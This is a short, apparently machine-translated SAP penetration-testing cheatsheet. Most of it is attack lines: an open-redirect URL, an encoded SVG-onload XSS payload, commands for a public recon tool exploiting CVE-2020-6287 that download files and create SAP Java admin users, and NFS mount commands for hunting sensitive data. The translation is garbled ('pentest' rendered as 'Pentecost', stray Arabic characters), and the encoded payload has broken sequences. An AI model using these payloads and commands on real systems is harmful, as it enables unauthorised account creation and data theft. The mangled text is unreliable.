SAP Pentest Cheatsheet
1.0.0
Bismillah
为了进行五旬节,您应该在网络上部署SAP系统
https:// host/sap/public/bc/icf/logoff?redirecturl = maliciousurl
http://主机:port/startpage
http://主机:port/sap/public/info
http://主机:port/sap/public/info
寻找/sapirexthelp https:// localhost/sapirexthelp
https:// host/host/sapirexthelp/Random/%22%3E%3C%53%56%47%20%4F%4E%4E%4C%4F%41%44%3D%26%26%23%39%37%37%26%26%23%31 %30%38%26%23%31%31%31%26%23%31%31%31%26%26%31%31%31%36%28%26%26%23%36%36%34%26%26%23%78%66%66%26%26%23%23%78%36 %33%26%23%78%37%37%35%26%23%78%36%64%26%23%78%36%35%26%26%23%78%65%65%26%26%23%78%37%34%34%26%23%23%78%78%32%65%65%26 %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%26%23%78%36%31%26%26%23%78%36%39%26%26%23%23%78%36%65%65%29%3E.asp
SAP信息系统1.0外壳上传
CVE-2022-22536(ICMAD SAP)
SAP侦察漏洞(CVE-2020-6287,CVE-2020-6286)
https://github.com/chipik/sap_recon
下载zip文件
python recon.py -H 172.16.30.8 -f /1111.zip
创建SAP Java用户
Python recon.py -H 172.16.30.8 -U
创建SAP Java管理员用户
python recon.py -H 172.16.30.8 -a -a
SSLSCAN
nfs-ls nfs:// host/mount
mkdir mnt && mount -t nfs主机:/mount ./mnt
祝您搜索敏感信息的好运
我正在寻找SAP虚拟机或容器进行五型模拟,如果您有信息,请访问我@linkedin)
分享很关心
ك证ص。
